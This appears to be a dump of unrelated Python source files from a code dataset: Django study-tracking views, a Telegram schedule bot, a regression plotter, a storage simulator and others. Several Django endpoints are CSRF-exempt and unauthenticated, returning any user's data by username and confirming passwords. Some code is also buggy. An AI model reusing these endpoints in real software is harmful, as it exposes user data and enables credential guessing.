calc_average_data(request.user.username, 'science')\n h_average = calc_average_hour_data(request.user.username, 'science')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_science.html', cont)\n\ndef statisticsview_korean(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'korean')\n lastweek = calc_lastweek_data(request.user.username)\n average = calc_average_data(request.user.username, 'korean')\n h_average = calc_average_hour_data(request.user.username, 'korean')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_korean.html', cont)\n\ndef statisticsview_english(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'english')\n lastweek = calc_lastweek_data(request.user.username)\n average = calc_average_data(request.user.username, 'english')\n h_average = calc_average_hour_data(request.user.username, 'english')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_english.html', cont)\n\ndef statisticsview_all(request):\n calc_month = calc_average_month_data(request.user.username)\n return render(request, 'elections/viewstatistics_all.html', {'calcmonth': calc_month})\n\n# ======================================================================================================= #\n\n# 공부기록 업데이트 view\ndef statisticscalendar(request):\n days = getmonthdays()\n cont = {'days': days, 'today': gettoday(), 'month': getmonth(), 'year': getyear()}\n return render_to_response('elections/statisticscalender.html', cont)\n\n# ======================================================================================================= #\n\n# 입력창에서 받은 값 처리 view\ndef statisticsform(request):\n form = StatisticsWriteForm(request.POST or None)\n\n if form.is_valid():\n dm = DBManager()\n query = dm.getusertodaydata(request.user.username)\n math = form.cleaned_data.get('math')\n m_math = form.cleaned_data.get('m_math')\n\n korean = form.cleaned_data.get('korean')\n m_korean = form.cleaned_data.get('m_korean')\n\n science = form.cleaned_data.get('science')\n m_science = form.cleaned_data.get('m_science')\n\n english = form.cleaned_data.get('english')\n m_english = form.cleaned_data.get('m_english')\n #if query exsist is True >> 데이터 수정 , else >> 데이터 생성\n if query.exists():\n query.update(mathhour=calc_study_time(math, m_math), koreanhour=calc_study_time(korean, m_korean), sciencehour=calc_study_time(science, m_science),\n englishhour=calc_study_time(english, m_english))\n return render(request, 'elections/statistics.html')\n else:\n model_study_data = UserStudyData(date=str_yearnow(),name=request.user.username, mathhour=calc_study_time(math, m_math), koreanhour=calc_study_time(korean, m_korean),\n englishhour=calc_study_time(english, m_english), sciencehour=calc_study_time(science, m_science))\n model_study_data.save()\n return render(request, 'elections/statistics.html')\n\n return render(request, 'elections/statisticsform.html', {'form' : form})\n\ndef signup(request):\n form = CreateUserForm(request.POST or None)\n if request.user.is_authenticated:\n return redirect('index')\n\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n c_password = form.cleaned_data.get('password2')\n\n existsID = User.objects.filter(username=username).exists()\n\n if password == c_password and existsID is False:\n form.signup()\n else:\n content = {'form' : form, 'error' : \"이미 가입된 아이디 이거나 비밀번호 재확인을 해주세요\"}\n content.update(csrf(request))\n return render_to_response('elections/register.html', content)\n return redirect('index')\n\n return render(request, 'elections/register.html', {'form': form})\n\n\ndef login_view(request):\n form = UserLoginForm(request.POST or None)\n cont = {}\n if request.user.is_authenticated:\n return redirect('index')\n\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n cont['form'] = form\n cont['error'] = 'Login failed!'\n cont.update(csrf(request))\n return render_to_response('elections/login.html', cont)\n else:\n try:\n username = form.cleaned_data.get('username')\n existsID = User.objects.filter(username=username).exists()\n\n if existsID is False:\n cont['form'] = form\n cont['error'] = '가입되지 않은 회원입니다!'\n cont.update(csrf(request))\n return render_to_response('elections/login.html', cont)\n except:\n return render(request, 'elections/login.html', {\"form\": form, \"title\": 'Login'})\n\n return render(request, 'elections/login.html', {\"form\": form, \"title\": 'Login'})\n\n# ======================================================================================================= #\n\n# Java API 연동 (csrf token)\n\n# Response user all data\n# @return dict\n@csrf_exempt\ndef response_user_data(request):\n username = request.POST['username']\n db = DBManager()\n data = db.get_dict_userdata(username=username)\n\n return JsonResponse(data)\n\n# Response user data filter\n# @return dict\n@csrf_exempt\ndef response_user_cond_data(request):\n username = request.POST['username']\n year = request.POST['year']\n month = request.POST['month']\n day = request.POST['day']\n\n db = DBManager()\n dict_data = db.get_dict_userdata_cond(username, year, month, day)\n\n return JsonResponse(dict_data)\n\n# Response user id&password registered check\n# @return boolean\n@csrf_exempt\ndef response_user_valid(request):\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n\n if user is not None:\n return JsonResponse({'valid': True })\n\n return JsonResponse({'valid': False})\n\n# Response user week statistics\n# return dict\n@csrf_exempt\ndef response_user_statistics_week(request):\n username = request.POST['username']\n\n calcweek = calc_week_data(username=username)\n return JsonResponse(calcweek)\n\n# Response user average month statistics\n# return dict\n@csrf_exempt\ndef response_user_statistics_month(request):\n username = request.POST['username']\n\n calcmonth = calc_average_month_data(username=username)\n return JsonResponse(calcmonth)\n\n","sub_path":"elections/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97540566","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport re\n\nimport telebot\nfrom telebot import types\n\nimport datetime\n\nimport commands,ApiManager,mirror\n\nfrom datetimeManager import get_week_number,get_day\n\nwith open('botconfig') as f:\n\tAPI_TOKEN = f.read().replace('\\n','')\n\nbot = telebot.TeleBot(API_TOKEN)\n\ndatabase = \"database.txt\"\n\nuser_dict = {}\n\nemployee_name = []\n\ndelta = [0]\n\n\nclass User:\n def __init__(self, department=\"\", identificator=\"\"):\n self.department = department\n self.identificator = identificator\n def save(self, chat_id):\n user_dict[chat_id] = self\n with open(database,\"a\") as f:\n f.write(\"{0}####{1}####{2}\\n\".format(chat_id, self.department, self.identificator))\n\n\ndef read_users(file):\n try:\n with open(file) as f:\n for line in f.readlines():\n chat_id, department, identificator = line[:-1].split(\"####\")\n user_dict[int(chat_id)] = User(department=department, identificator=identificator)\n except:\n f = open(file,\"w\")\n f.close()\n \n\n# Handle '/start' and '/help'\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n chat_id = message.chat.id\n \n hi_message = \"Привет!\\nДля просмотра рассписания используйте комманду /show\\nНо для начала нужно представиться, используйте комманду /hi\"\n \n bot.send_message(chat_id, hi_message)\n\n\n@bot.message_handler(commands=['hi'])\ndef send_welcome(message):\n try:\n msg = bot.reply_to(message, \"Представьтесь, напишите вашу группу либо Фамилию Имя?\")\n bot.register_next_step_handler(msg, process_search_step)\n except Exception as e:\n print(e)\n \n \ndef process_search_step(message):\n try:\n chat_id = message.chat.id\n text = message.text\n \n if text in ApiManager.getGroupsList():\n user = User(department='group',identificator=text)\n user.save(chat_id)\n bot.reply_to(message, \"Группа найдена. Можете смотреть рассписание. (/show)\")\n return\n employees = ApiManager.getEmployeesList()\n for identificator, employee in employees:\n if employee == text:\n user = User(department='employee',identificator=identificator)\n user.save(chat_id)\n bot.reply_to(message, \"Преподаватель найден. Можете смотреть рассписание. (/show)\")\n return\n \n for identificator, employee in employees:\n if re.search(text.lower(),employee.lower()):\n bot.reply_to(message, \"Быть может это {0} ?\\\n да/нет?\".format(employee))\n employee_name.append(identificator)\n bot.register_next_step_handler(message, process_employee_step)\n break\n else:\n bot.reply_to(message, \"Ничего не нашли.\")\n except Exception as e:\n print(e)\n\n\ndef process_employee_step(message):\n chat_id = message.chat.id\n text = message.text\n if text==\"да\" or text==\"Да\":\n user = User(department='employee',identificator=employee_name.pop())\n user.save(chat_id)\n bot.reply_to(message, \"Запомнили. Можете смотреть рассписание. (/show)\")\n return\n else:\n bot.reply_to(message, \"Попробуйте поискать ещё раз.\")\n return\n\n\n@bot.message_handler(commands=['show'])\ndef today_schedule(message):\n try:\n chat_id = message.chat.id\n user = user_dict[chat_id]\n delta[0]=0\n resend(message)\n except Exception as e:\n bot.send_message(chat_id, \"Вы забыли представится, используйте комманду /hi\")\n\n\ndef resend(message):\n chat_id = message.chat.id\n user = user_dict[chat_id]\n \n if message.text not in ('/show','вчера','завтра'):\n delta[0]=0\n markup = types.ReplyKeyboardHide(selective=False)\n bot.send_message(chat_id, \"Окей :)\", reply_markup=markup)\n return\n if message.text=='вчера':\n delta[0]-=1\n elif message.text=='завтра':\n delta[0]+=1\n if message.text:\n if user.department == 'group':\n msg = commands.schedule_to_string(user,datetime.date.today() + datetime.timedelta(days=delta[0]))\n elif user.department == 'employee':\n msg = commands.schedule_to_string(user,datetime.date.today() + datetime.timedelta(days=delta[0]))\n else:\n msg = [\"Заполните информацию о себе\"]\n for m in msg:\n bot.send_message(chat_id, m)\n markup = types.ReplyKeyboardMarkup()\n itembtn1 = types.KeyboardButton('вчера')\n itembtn2 = types.KeyboardButton('хватит')\n itembtn3 = types.KeyboardButton('завтра')\n markup.row(itembtn1,itembtn3)\n markup.row(itembtn2)\n bot.send_message(chat_id, \"Хотите ещё?\", reply_markup=markup)\n bot.register_next_step_handler(message, resend)\n markup = types.ReplyKeyboardHide(selective=False)\n\nread_users(database)\nbot.polling()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"565937531","text":"import xlrd\nimport datetime\nimport test_data_inputpath\nimport common_login\n\n\nclass FormExcelRead(common_login.CommonLogin):\n def __init__(self):\n self.start_date_time = datetime.datetime.now()\n super(FormExcelRead, self).__init__()\n\n # ------------- file reader index -------------------\n workbook = xlrd.open_workbook(test_data_inputpath.crpo_test_data_file['create_form'])\n if self.login_server == 'betaams':\n self.form_sheet1 = workbook.sheet_by_index(0)\n if self.login_server == 'ams':\n self.form_sheet1 = workbook.sheet_by_index(0)\n if self.login_server == 'amsin':\n self.form_sheet1 = workbook.sheet_by_index(1)\n\n # --------------- Value initialization ----------------\n self.xl_candidate_name = []\n self.xl_date_time = []\n self.xl_college = []\n self.xl_gender = []\n self.xl_country = []\n self.xl_address = []\n self.xl_birth_date = []\n self.xl_current_time = []\n self.xl_python_tutorial = []\n self.xl_java_tutorial = []\n\n # ------------- Iterate Excel sheet------------------------\n self.event_excel_read()\n\n def event_excel_read(self):\n # --------------------------------------candidate details-------------------------------------------------------\n for i in range(1, self.form_sheet1.nrows):\n number = i # Counting number of rows\n rows = self.form_sheet1.row_values(number)\n\n if rows[0]:\n self.xl_candidate_name.append(rows[0])\n if rows[1]:\n self.xl_date_time.append(rows[1])\n if rows[2]:\n self.xl_college.append(str(rows[2]))\n if rows[3]:\n self.xl_gender.append(str(rows[3]))\n if rows[4]:\n self.xl_country.append(str(rows[4]))\n if rows[5]:\n self.xl_address.append(str(rows[5]))\n if rows[6]:\n self.xl_birth_date.append(str(rows[6]))\n if rows[7]:\n self.xl_current_time.append(str(rows[7]))\n if rows[8]:\n self.xl_python_tutorial.append(str(rows[8]))\n if rows[9]:\n self.xl_java_tutorial.append(str(rows[9]))\n","sub_path":"scripts/embrace/form_creation/create_form_excel.py","file_name":"create_form_excel.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384574893","text":"#! coding:utf-8\n\nimport sys\nimport time\nimport random\n\nimport rospy\n\nfrom std_msgs.msg import String\nfrom mal_msgs.msg import (\n ArmServoMovement,\n LegServoMovement,\n Movement\n )\n\nclass DemobehaviorArm(object):\n\n ARM_SERVO_TOPIC = \"/mal_control/control_arm_servo\"\n LEG_SERVO_TOPIC = \"/mal_control/control_leg_servo\"\n MOVEMENT_TOPIC = \"/mal_control/command\"\n\n def __init__(self, node_name=\"demobehavior_arm\", fps=30):\n rospy.init_node(node_name)\n self.r = rospy.Rate(fps)\n\n self.arm_pub = rospy.Publisher(self.ARM_SERVO_TOPIC, ArmServoMovement, queue_size=10)\n self.leg_pub = rospy.Publisher(self.LEG_SERVO_TOPIC, LegServoMovement, queue_size=10)\n self.move_pub = rospy.Publisher(self.MOVEMENT_TOPIC, Movement, queue_size=10)\n \n def main(self):\n\n mov = [Movement.FRONT, Movement.FRONT_LEFT, Movement.FRONT_RIGHT, Movement.BACK, Movement.BACK_LEFT, Movement.BACK_RIGHT, Movement.ROLL_RIGHT, Movement.ROLL_LEFT, Movement.STOP]\n mov_count = 0\n while not rospy.is_shutdown():\n \n arm_order = ArmServoMovement()\n isMoveArm = random.randint(0, 100)\n if isMoveArm < 100:\n\n rospy.loginfo(\"==================== Arm Moving\")\n \n arm_order.servo_num = random.randint(0, 2)\n\n movement = random.randint(0, 2)\n\n if movement == 0:\n arm_order.movement = ArmServoMovement.FORWARD\n\n if movement == 1:\n arm_order.movement = ArmServoMovement.BACK\n\n if movement == 2:\n arm_order.movement = ArmServoMovement.STOP\n\n rospy.loginfo(arm_order)\n\n self.arm_pub.publish(arm_order)\n self.r.sleep()\n else:\n arm_order.movement = ArmServoMovement.STOP\n self.arm_pub.publish(arm_order)\n \n #self.r.sleep()\n\n time.sleep(random.randint(0, 3))\n \n \nif __name__ == '__main__':\n dh = Demobehavior()\n dh.main()\n","sub_path":"src/mal_decision_making/demobehavior_arm.py","file_name":"demobehavior_arm.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205764973","text":"from tkinter import *\nfrom math import floor\nimport graph\nimport user_input\nimport re\n\n\"\"\"The meat of the program -- the calculator. Handles all the mathematical\noperations involved in computing a linear regression. Modularizes the steps \nand parts of the computation into smaller functions that are all called\nin sequence in the a conglomerate method: calculate, which also computes the\ncrucial values of m and b, thus acquiring the equation for the regression line.\n\nAlso contains methods for finding the max and min x and y values.\"\"\"\nclass Calculator:\n\t\"\"\"Set up the data to be processed and used for calculations.\"\"\"\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.x = []\n\t\tself.y = []\n\t\tfor elem in data:\n\t\t\tself.x.append(elem[0])\n\t\t\tself.y.append(elem[1])\n\n\t\"\"\"Find all necessary values and using it, compute the value of m and b.\"\"\"\n\tdef calculate(self):\n\t\tN = self.N()\n\t\tprint(\"N: \" + str(N))\n\t\txtotal = self.xsum()\n\t\tprint(\"xtotal: \" + str(xtotal))\n\t\tytotal = self.ysum()\n\t\tprint(\"ytotal: \" + str(ytotal))\n\t\txytotal = self.xysum()\n\t\tprint(\"xytotal: \" + str(xytotal))\n\t\tx2total = self.x2sum()\n\t\tprint(\"x2total: \" + str(x2total))\n\t\ty2total = self.y2sum()\n\t\tprint(\"y2total: \" + str(y2total))\n\n\t\tm = ((N * xytotal) - (xtotal * ytotal))/((N * x2total) - (xtotal * xtotal))\n\t\t#print(\"m: \" + str(m))\n\n\t\tb = ((x2total * ytotal) - (xtotal * xytotal))/((N * x2total) - (xtotal * xtotal))\n\t\t#print(\"b: \" + str(b))\n\n\t\treturn m, b\n\n\t\"\"\"Define the line using our values for m and b -- output a value given an input.\"\"\"\n\tdef line(self, m, b, x):\n\t\ty = m * x + b\n\n\t\treturn y\n\n\t\"\"\"Compute the sum of all x.\"\"\"\n\tdef xsum(self):\n\t\txtotal = 0\n\t\tfor elem in self.x:\n\t\t\txtotal += float(elem)\n\t\treturn xtotal\n\n\t\"\"\"Compute the sum of all y\"\"\"\n\tdef ysum(self):\n\t\tytotal = 0\n\t\tfor elem in self.y:\n\t\t\tytotal += float(elem)\n\t\treturn ytotal\n\n\t\"\"\"Compute the sum of x*y\"\"\"\n\tdef xysum(self):\n\t\txytotal = 0\n\t\txy = []\n\t\tfor elem in self.data:\n\t\t\txy.append(float(elem[0]) * float(elem[1])) #compute x * y for a given pair\n\n\t\tfor elem in xy:\n\t\t\txytotal += elem #sum the values found before.\n\n\t\treturn xytotal\n\n\t\"\"\"Compute the sum of x squared.\"\"\"\n\tdef x2sum(self):\n\t\tx2total = 0\n\t\tfor elem in self.x:\n\t\t\t#print(float(elem) ** 2)\n\t\t\tx2total += float(elem) ** 2\n\t\treturn x2total\n\n\t\"\"\"Compute the sum of y squared.\"\"\"\n\tdef y2sum(self):\n\t\ty2total = 0\n\t\tfor elem in self.y:\n\t\t\ty2total += float(elem) ** 2\n\t\treturn y2total\n\n\t\"\"\"Compute N (number of data points)\"\"\"\n\tdef N(self):\n\t\tif len(self.data) == 0:\n\t\t\tprint(\"There is no data\")\n\t\t\tsys.exit(0)\n\t\treturn len(self.data)\n\n\t\"\"\"Compute max X value.\"\"\"\n\tdef getMaxX(self):\n\t\tmax = 0\n\t\tfor elem in self.x:\n\t\t\tif float(elem) > max:\n\t\t\t\tmax = float(elem)\n\n\t\treturn max\n\n\t\"\"\"Compute max Y value.\"\"\"\n\tdef getMaxY(self):\n\t\tmax = 0\n\t\tfor elem in self.y:\n\t\t\tif float(elem) > max:\n\t\t\t\tmax = float(elem)\n\n\t\treturn max\n\n\t\"\"\"Compute min X value\"\"\"\n\tdef getMinX(self):\n\t\tmin = float(self.x[0])\n\t\tfor elem in self.x:\n\t\t\tif float(elem) < min:\n\t\t\t\tmin = float(elem)\n\n\t\treturn min\n\n\t\"\"\"Compute min Y value\"\"\"\n\tdef getMinY(self):\n\t\tmin = float(self.x[0])\n\t\tfor elem in self.y:\n\t\t\tif float(elem) < min:\n\t\t\t\tmin = float(elem)\n\t\t\t\tprint(min)\n\n\t\treturn min\n\n\"\"\"Function for finding the ratio as described in the explanation of the plotting \n\talgorithm found in graph.py.\"\"\"\ndef ratioCalc(x, y, xLimit, yLimit):\n\tratioX = x/xLimit\n\tratioY = y/yLimit\n\n\treturn ratioX, ratioY\n\n\"\"\"Main function. Drives the program.\"\"\"\ndef main():\n\troot = Tk() #establish tkinter root.\n\n\tinp = user_input.Input(root) #pass in the root, initialize input.\n\t#root.mainloop() \t\t \t #start the mainloop.\n\tcontents = inp.getContents() #grab the contents.\n\n\tpar = user_input.Parser(contents) #Parse the input.\n\tdata = par.extract() #extract the data from it.\n\n\tcalc = Calculator(data) #calculate using the found data.\n\tm, b = calc.calculate()\n\tprint(\"m: \" + str(m))\n\tprint(\"b: \" + str(b))\n\t\n\n\n\troot2 = Tk() #get second root for plotting.\n\n\tout = graph.output(root2)\n\tout.insertDataText1(contents, calc.N(), m, b)\n\tout.insertDataText2(calc.xsum(), calc.ysum(), \n\t\tcalc.x2sum(), calc.y2sum(), calc.xysum())\n\tout.drawEqn(m, b)\n\tout.drawAxes()\n\tmaxY = calc.getMaxY()\n\tmaxX = calc.getMaxX()\n\tminY = calc.getMinY()\n\tminX = calc.getMinX()\n\tout.labelAxes(maxY, maxX) #grab necessary values and set up the graph.\n\n\tplotX1 = minX\n\tplotY1 = calc.line(m, b, plotX1)\n\tplotX2 = maxX\n\tplotY2 = calc.line(m, b, plotX2)\n\t#find necessary points.\n\tratioX1, ratioY1 = ratioCalc(plotX1, plotY1, maxX, maxY) #find ratios.\n\tratioX2, ratioY2 = ratioCalc(plotX2, plotY2, maxX, maxY)\n\n\tout.drawLine(ratioX1, ratioY1, ratioX2, ratioY2) #draw line\n\tout.drawPoints(data, maxX, maxY) #draw points.\n\n\troot2.mainloop()\n\nif __name__ == '__main__':\n\tmain()","sub_path":"regcalc.py","file_name":"regcalc.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545900898","text":"n, m = [int(x) for x in input().split()]\na = []\nfor _ in range(n):\n a.append(list(str(input())))\n\nvisited = [[0 for i in range(m)] for j in range(n)]\n\nans = []\nfor i in range(n):\n for j in range(m):\n if a[i][j]=='*':\n x = 1\n while 1:\n if i + x < n and j + x < m and i - x > -1 and j - x > -1:\n if a[i+x][j]=='*' and a[i-x][j]=='*' and a[i][j+x]=='*' and a[i][j-x]=='*':\n visited[i][j+x] = 1\n visited[i][j-x] = 1\n visited[i-x][j] = 1\n visited[i+x][j] = 1\n visited[i][j] = 1\n x += 1\n else:\n break\n else:\n break\n if x>1:\n ans.append([i, j, x-1])\n\nfor i in range(n):\n for j in range(m):\n if a[i][j]=='*' and visited[i][j] == 0:\n print( -1)\n exit(0)\n\nprint( len(ans))\nfor i in ans:\n for j in i[:-1]:\n print( j+1,end=\" \")\n print (i[-1], end=\" \")\n print()","sub_path":"CodeForces/501__3_E_star_drawing_easy.py","file_name":"501__3_E_star_drawing_easy.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462769539","text":"import cv2 as cv\nimport os\n\npath = os.getcwd()\nname = 'Meqdad'\ncam = cv.VideoCapture(0)\nimg_counter = 0\n\nwhile True:\n is_success, frame = cam.read()\n if not is_success:\n print(\"failed to capture image.\")\n break\n cv.imshow(\"Collecting Data by pressing space\", frame)\n\n k = cv.waitKey(1)\n\n # Check if ESC is pressed\n if k%256 == 27:\n print(\"Press ESC to close...\")\n break\n\n # Check if space is pressed\n elif k%256 == 32:\n img_name = f\"{path}/CollectedData/{name}_img_{img_counter}.jpg\"\n cv.imwrite(img_name, frame)\n print(f\"Image #{img_counter} saved!\")\n img_counter += 1\n\ncam.release()\ncv.destroyAllWindows()","sub_path":"Face Detection/1-collect_data.py","file_name":"1-collect_data.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"173317334","text":"__author__ = 'vialette'\n\n# non-reconfigurable simulator\nimport ultrastorage.simulator.nonreconfigurable as nonreconfigurable\n\n# insertion politics\nimport ultrastorage.inserter as inserter\n\n# storage system\nimport ultrastorage.storagesystem as storagesystem\n\n# item generator\nimport ultrastorage.itemgenerator as itemgenerator\n\n# timout generator\nimport ultrastorage.timeoutgenerator as timeoutgenerator\n\n# timed item generator\nimport ultrastorage.timeditemgenerator as timeditemgenerator\n\n#from ultrastorage.tools import terrabyte\n\nimport simpy\nenvironment = simpy.Environment()\n\nname = \"myStorageSystem\"\nnumber_of_storage_units = 5\ncapacity = 10000000\ncpu = 2\ntransfer_time_manager = storagesystem.transfertimemanager.Ethernet()\nstorage_system = storagesystem.homogeneous_storage_system_builder(environment,\n number_of_storage_units,\n capacity,\n cpu,\n transfer_time_manager,\n name=name)\nprint(storage_system)\n\n\nsimulator = nonreconfigurable.Overflow(storage_system, inserter.Roundabout)\n\n# our item generator\nitem_generator = itemgenerator.VU2005()\ntimeout_generator = timeoutgenerator.Exponential(10)\ntimed_item_generator = timeditemgenerator.TimedItemGenerator(item_generator, timeout_generator)\nenvironment.process(timed_item_generator.run(environment, simulator))\n\nsimulator.run(environment)\n#\n#\nprint(\"number of generated items={}\".format(timed_item_generator.number_of_items()))\nprint(\"numberof items in the storage system={}\".format(storage_system.number_of_items()))\n\nfor i, item_event in enumerate(storage_system.item_event_controller):\n print(\"{}: {}\".format(i+1, item_event))\n\n\n#snapshots = storage_system.snapshot_controller.snapshots()\nfor (index, snapshot) in enumerate(storage_system.snapshot_controller):\n print(\"{}: {}\\n\".format(index+1, str(snapshot)))\n#\n#\nsnapshot_reporter = storagesystem.StorageSystemSnapshotReporter(storage_system.snapshot_controller)\n#\nfor i, sizes in enumerate(snapshot_reporter.values('size')):\n print(\"{}: {}\".format(i+1, sizes))\n#\nfor i, size in enumerate(snapshot_reporter.average('size')):\n print(\"{}: {}\".format(i+1, size))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"615136055","text":"from django.urls import path\nfrom .views import (\n UserListView,\n UserDetailView,\n UserFollowersListView,\n UserFollowingListView,\n UserBlockedUserListView,\n UserBlockingUserListView,\n FollowCreateView,\n FollowDestroyView,\n BlockCreateView\n)\n\napp_name=\"User\"\n\nurlpatterns = [\n path(\"api/users/\", UserListView.as_view(), name=\"user-list\"),\n path(\"api/users//\", UserDetailView.as_view(), name=\"user-detail\"),\n path(\"api/users//followers/list\", UserFollowersListView.as_view(), name=\"user-followers-list\"),\n path(\"api/users//following/list\", UserFollowingListView.as_view(), name=\"user-following-list\"),\n path(\"api/users//blocks/list\", UserBlockedUserListView.as_view(), name=\"user-blocks-list\"),\n path(\"api/users//blocking/list\", UserBlockingUserListView.as_view(), name=\"user-blocking-list\"),\n path(\"api/follow/create\", FollowCreateView.as_view(), name=\"follow-create\"),\n path(\"api/follow/delete\", FollowDestroyView.as_view(), name=\"follow-destroy\"),\n path(\"api/block/create\", BlockCreateView.as_view(), name=\"block-create\")\n]\n","sub_path":"analyticsApp/User/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149889185","text":"import http.server\nimport http.client\nfrom urllib.parse import urlparse\nimport urllib\n\nfrom web_server import templates\nfrom web_server.routes import RouteManager\n\n\nclass RequestHandler(http.server.BaseHTTPRequestHandler):\n\n def handle_one_request(self):\n try:\n self.raw_requestline = self.rfile.readline(65537)\n if len(self.raw_requestline) > 65536:\n self.requestline = ''\n self.request_version = ''\n self.command = ''\n self.send_error(http.client.REQUEST_URI_TOO_LONG)\n return\n if not self.raw_requestline:\n self.close_connection = True\n return\n if not self.parse_request():\n # An error code has been sent, just exit\n return\n\n content = None\n route_found = False\n m = RouteManager().mapper()\n route_data = m.match(self.path)\n if route_data:\n handler_class = RouteManager.get_handler_class(route_data['controller'])\n class_method = route_data['action']\n content = getattr(handler_class(), class_method)(self)\n route_found = True\n\n if not route_found:\n self.send_error(\n http.client.NOT_IMPLEMENTED,\n \"Unsupported method (%r)\" % self.command)\n return\n if not content:\n self.send_error(\n http.client.NO_CONTENT,\n \"No content (%r)\" % self.command)\n return\n\n self.wfile.write(str(content).encode())\n self.wfile.flush()\n\n except http.server.socket.timeout as e:\n self.log_error(\"Request timed out: %r\", e)\n self.close_connection = True\n\n @property\n def decode_post_data(self):\n post = self.rfile.read(int((self.headers['Content-Length'])))\n bytes_decode_post = bytes.decode(post)\n return urllib.parse.parse_qs(bytes_decode_post)\n\n def render(self, template_pass, data=None):\n self.send_response(http.client.OK)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n content = str(templates.render(\n template_pass, data))\n return content\n","sub_path":"web_server/request_handlers.py","file_name":"request_handlers.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"431109437","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSample anomaly detector by using Euclidean distance from mean over all\r\ntraining data.\r\n\r\n@author: Kevin S. Xu\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sklearn.feature_extraction import DictVectorizer\r\nfrom sklearn.ensemble import IsolationForest\r\nfrom sklearn import svm\r\nfrom sklearn.neighbors import LocalOutlierFactor\r\n\r\n\r\ndef predictAnomalies(trainFeatures,testFeatures):\r\n nAttr = len(trainFeatures.dtype)\r\n nCatAttr = 3\r\n nRealAttr = nAttr - nCatAttr\r\n nTrainSamples = np.size(trainFeatures)\r\n nTestSamples = np.size(testFeatures)\r\n \r\n # Get list of names of categorical attributes\r\n catAttrNames = list(trainFeatures.dtype.names[-nCatAttr:])\r\n \r\n # Convert categorical features to binary using 1-of-K representation \r\n trainCat = trainFeatures[catAttrNames]\r\n trainCatDict = catFeatureDict(trainCat,catAttrNames)\r\n dv = DictVectorizer()\r\n trainCatEncoded = dv.fit_transform(trainCatDict).toarray()\r\n testCat = testFeatures[catAttrNames]\r\n testCatDict = catFeatureDict(testCat,catAttrNames)\r\n testCatEncoded = dv.transform(testCatDict).toarray() \r\n \r\n # Extract real features and convert all to float type\r\n trainReal = np.zeros((nTrainSamples,nRealAttr))\r\n testReal = np.zeros((nTestSamples,nRealAttr))\r\n for attr in range(nRealAttr):\r\n trainReal[:,attr] = trainFeatures['f' + str(attr)].astype(float)\r\n testReal[:,attr] = testFeatures['f' + str(attr)].astype(float)\r\n \r\n # Combine real features and encoded categorical features (now all of type\r\n # float)\r\n trainAll = np.c_[trainReal,trainCatEncoded]\r\n testAll = np.c_[testReal,testCatEncoded]\r\n \r\n # Simple anomaly detector--compute distance of each test sample from mean\r\n # over all training samples\r\n \r\n #LOF \"Large values corespond to inliers, abs makes lower more normal (need to normalize data)\r\n outlierFactor = LocalOutlierFactor(n_neighbors=10, novelty=True, contamination=\"auto\")\r\n outlierFactor.fit(trainAll)\r\n outlierScore = outlierFactor.score_samples(testAll)\r\n outlierScore = np.abs(outlierScore)\r\n outlierScore = (outlierScore - min(outlierScore)) / (max(outlierScore) - min(outlierScore))\r\n \r\n \r\n #gives 0 to 1 results\r\n SVMfunction = svm.OneClassSVM(kernel = \"rbf\", gamma=\"auto\")\r\n SVMfunction.fit(trainAll)\r\n SVMScore = SVMfunction.score_samples(testAll)\r\n SVMScore = np.abs(SVMScore)\r\n SVMScore = (SVMScore - 